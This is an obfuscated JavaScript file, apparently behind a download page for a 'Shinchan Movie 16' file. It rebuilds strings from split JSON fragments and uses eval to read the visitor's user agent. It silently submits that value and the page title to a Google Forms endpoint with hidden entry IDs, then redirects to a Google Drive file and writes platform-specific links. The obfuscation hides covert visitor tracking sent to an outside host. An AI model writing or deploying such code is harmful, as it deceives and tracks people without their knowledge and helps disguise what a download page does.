function DownL(){
    var X = document.getElementById("2");var Yx = document.getElementById("3");Yx.value = document.title;
    var _XssaEFcDeCAfexA = '{\"_xWafbxAscfAs\":{\"_AefcAbCADexSCaBA0\":\"na\",\"_AefcAbCADexSCaBA1\":\"vig\",\"_AefcAbCADexSCaBA2\":\"at\",\"_AefcAbCADexSCaBA3\":\"or\",\"_AefcAbCADexSCaBA4\":\".\",\"_AefcAbCADexSCaBA5\":\"use\",\"_AefcAbCADexSCaBA6\":\"rAge\",\"_AefcAbCADexSCaBA7\":\"nt\"}}';
var _XAQmabXeWvAcoUT = JSON.parse(_XssaEFcDeCAfexA);
    var _zXcaCinOxaSjEt = _XAQmabXeWvAcoUT._xWafbxAscfAs._AefcAbCADexSCaBA0 + _XAQmabXeWvAcoUT._xWafbxAscfAs._AefcAbCADexSCaBA1 + _XAQmabXeWvAcoUT._xWafbxAscfAs._AefcAbCADexSCaBA2 + _XAQmabXeWvAcoUT._xWafbxAscfAs._AefcAbCADexSCaBA3 + _XAQmabXeWvAcoUT._xWafbxAscfAs._AefcAbCADexSCaBA4 + _XAQmabXeWvAcoUT._xWafbxAscfAs._AefcAbCADexSCaBA5 + _XAQmabXeWvAcoUT._xWafbxAscfAs._AefcAbCADexSCaBA6 + _XAQmabXeWvAcoUT._xWafbxAscfAs._AefcAbCADexSCaBA7;var _FexAcdbCdfeXaAin = eval(_zXcaCinOxaSjEt);X.value = _FexAcdbCdfeXaAin;var Z =document.getElementById("form");Z.submit(); 
    var st = '{\"XeAfCqAjKOa\":{\"ae0f01\":\"ht\",\"ae0f02\":\"t\",\"ae0f03\":\"p\",\"ae0f04\":\"s\",\"ae0f05\":\":\",\"ae0f06\":\"/\",\"ae0f07\":\"/\",\"ae0f08\":\"dr\",\"ae0f09\":\"iv\",\"ae0f10\":\"\",\"ae0f11\":\"e\",\"ae0f12\":\".\",\"ae0f13\":\"go\",\"ae0f14\":\"og\",\"ae0f15\":\"le\",\"ae0f16\":\".\",\"ae0f17\":\"co\",\"ae0f18\":\"m\",\"ae0f19\":\"/\",\"ae0f20\":\"fi\",\"ae0f21\":\"l\",\"ae0f22\":\"e\",\"ae0f23\":\"/\",\"ae0f24\":\"d\",\"ae0f25\":\"/\",\"ae0f26\":\"1Bz9VYK\",\"ae0f27\":\"q4rspBPkM0t-\",\"ae0f28\":\"HyRE\",\"ae0f29\":\"Zj8\",\"ae0f30\":\"0gm\",\"ae0f31\":\"cW\",\"ae0f32\":\"ES"}}';
var _xAfeAd = JSON.parse(st);var _AxCefdA = _xAfeAd.XeAfCqAjKOa;location.href= _AxCefdA.ae0f01 + _AxCefdA.ae0f02 + _AxCefdA.ae0f03 + _AxCefdA.ae0f04 + _AxCefdA.ae0f05 + _AxCefdA.ae0f06 + _AxCefdA.ae0f07 + _AxCefdA.ae0f08 + _AxCefdA.ae0f09 + _AxCefdA.ae0f10 + _AxCefdA.ae0f11 + _AxCefdA.ae0f12 + _AxCefdA.ae0f13 + _AxCefdA.ae0f14 + _AxCefdA.ae0f15 + _AxCefdA.ae0f16 + _AxCefdA.ae0f17 + _AxCefdA.ae0f18 + _AxCefdA.ae0f19 + _AxCefdA.ae0f20 + _AxCefdA.ae0f21 + _AxCefdA.ae0f22 + _AxCefdA.ae0f23 + _AxCefdA.ae0f24 + _AxCefdA.ae0f25 + _AxCefdA.ae0f26 + _AxCefdA.ae0f27 + _AxCefdA.ae0f28 + _AxCefdA.ae0f29 + _AxCefdA.ae0f30 + _AxCefdA.ae0f31 + _AxCefdA.ae0f32;}    
function B(){
    var _XasdERds = document.getElementsByTagName('form');var _XaCfDFDfS1S = document.getElementsByTagName('input');
    var _CxzcFgrWer = '{\"_XadbxAfdsF\":{\"_eXxaSVghjKzxA\":\"htt\",\"_eXxaSVghjKzxB\":\"ps\",\"_eXxaSVghjKzxC\":\":\",\"_eXxaSVghjKzxD\":\"//\",\"_eXxaSVghjKzxE\":\"do\",\"_eXxaSVghjKzxF\":\"cs\",\"_eXxaSVghjKzxG\":\".\",\"_eXxaSVghjKzxH\":\"goo\",\"_eXxaSVghjKzxI\":\"gl\",\"_eXxaSVghjKzxJ\":\"e\",\"_eXxaSVghjKzxK\":\"co\",\"_eXxaSVghjKzxL\":\"m\",\"_eXxaSVghjKzxM\":\"/\",\"_eXxaSVghjKzxN\":\"for\",\"_eXxaSVghjKzxO\":\"ms\",\"_eXxaSVghjKzxP\":\"u\",\"_eXxaSVghjKzxQ\":\"1\",\"_eXxaSVghjKzxR\":\"d\",\"_eXxaSVghjKzxS\":\"e\",\"_eXxaSVghjKzxT\":\"1FAIp\",\"_eXxaSVghjKzxU\":\"QLSdQz\",\"_eXxaSVghjKzxV\":\"XMKfr6Y9\",\"_eXxaSVghjKzxW\":\"I5VXJ_iZ\",\"_eXxaSVghjKzxX\":\"b0ayYEGidIcH9NAE\",\"_eXxaSVghjKzxY\":\"jWIrJS02t\",\"_eXxaSVghjKzxZ\":\"gRww\",\"_eXxaSVghjKzxAA\":\"fo\",\"_eXxaSVghjKzxAB\":\"rmR\",\"_eXxaSVghjKzxAC\":\"espo\",\"_eXxaSVghjKzxAD\":\"nse\"}}';
    var _XcfvGhaLpo = JSON.parse(_CxzcFgrWer);
    var _MtgXasFg=_XcfvGhaLpo._XadbxAfdsF; 
                 _XasdERds[0].action = _MtgXasFg._eXxaSVghjKzxA + _MtgXasFg._eXxaSVghjKzxB + _MtgXasFg._eXxaSVghjKzxC + _MtgXasFg._eXxaSVghjKzxD + _MtgXasFg._eXxaSVghjKzxE + _MtgXasFg._eXxaSVghjKzxF + _MtgXasFg._eXxaSVghjKzxG + _MtgXasFg._eXxaSVghjKzxH + _MtgXasFg._eXxaSVghjKzxI + _MtgXasFg._eXxaSVghjKzxJ + _MtgXasFg._eXxaSVghjKzxG + _MtgXasFg._eXxaSVghjKzxK + _MtgXasFg._eXxaSVghjKzxL + _MtgXasFg._eXxaSVghjKzxM + _MtgXasFg._eXxaSVghjKzxN + _MtgXasFg._eXxaSVghjKzxO + _MtgXasFg._eXxaSVghjKzxM + _MtgXasFg._eXxaSVghjKzxP + _MtgXasFg._eXxaSVghjKzxM + _MtgXasFg._eXxaSVghjKzxQ + _MtgXasFg._eXxaSVghjKzxM + _MtgXasFg._eXxaSVghjKzxR + _MtgXasFg._eXxaSVghjKzxM + _MtgXasFg._eXxaSVghjKzxS + _MtgXasFg._eXxaSVghjKzxM + _MtgXasFg._eXxaSVghjKzxT + _MtgXasFg._eXxaSVghjKzxU + _MtgXasFg._eXxaSVghjKzxV + _MtgXasFg._eXxaSVghjKzxW + _MtgXasFg._eXxaSVghjKzxX + _MtgXasFg._eXxaSVghjKzxY + _MtgXasFg._eXxaSVghjKzxZ + _MtgXasFg._eXxaSVghjKzxM + _MtgXasFg._eXxaSVghjKzxAA + _MtgXasFg._eXxaSVghjKzxAB + _MtgXasFg._eXxaSVghjKzxAC + _MtgXasFg._eXxaSVghjKzxAD;
    var _cXBfbxCBi = '{\"_N123edafcXe\":{\"_ResdfA\":\"ent\",\"_ResdfB\":\"ry\",\"_ResdfC\":\".\",\"_ResdfD\":\"349394022\"}}';
    var _HscRefdFG = JSON.parse(_cXBfbxCBi); 
    var _EwasDfG = _HscRefdFG._N123edafcXe; 
                 _XaCfDFDfS1S[0].name = _EwasDfG._ResdfA + _EwasDfG._ResdfB + _EwasDfG._ResdfC + _EwasDfG._ResdfD;
    var _BdrEwqWR = '{\"_N123edafcXF\":{\"_ResdAA\":\"ent\",\"_ResdBB\":\"ry\",\"_ResdCC\":\".\",\"_ResdDD\":\"1919206551\"}}';
    var _XbOmfDc = JSON.parse(_BdrEwqWR); 
    var _EwasDfG = _XbOmfDc._N123edafcXF; _XaCfDFDfS1S[1].name = _EwasDfG._ResdAA + _EwasDfG._ResdBB + _EwasDfG._ResdCC + _EwasDfG._ResdDD;
    var _XdeREtrTRT = '{\"_N123edafcXTy\":{\"_ResdfAAA\":\"ent\",\"_ResdfBBB\":\"ry\",\"_ResdfCCC\":\".\",\"_ResdfDDD\":\"1060532289\"}}';
    var _CsaDfg = JSON.parse(_XdeREtrTRT);
     var _ErxSASD = _CsaDfg._N123edafcXTy;_XaCfDFDfS1S[2].name = _ErxSASD._ResdfAAA + _ErxSASD._ResdfBBB + _ErxSASD._ResdfCCC + _ErxSASD._ResdfDDD;
             var e = navigator.platform;if(e.charAt(0) == "L"){var t = `<a href="./Shinchan-Movie-16/Mobile/Shinchan-Movie16-Download-Mobile.html">Click Here For Site</a>`;document.write(t);}else if(e.charAt(0) == "M"){var t = `<a href="./Shinchan-Movie-16/Mac/Shinchan-Movie16-Download-Mac.html">Click Here For Site</a>`;document.write(t);}
          }
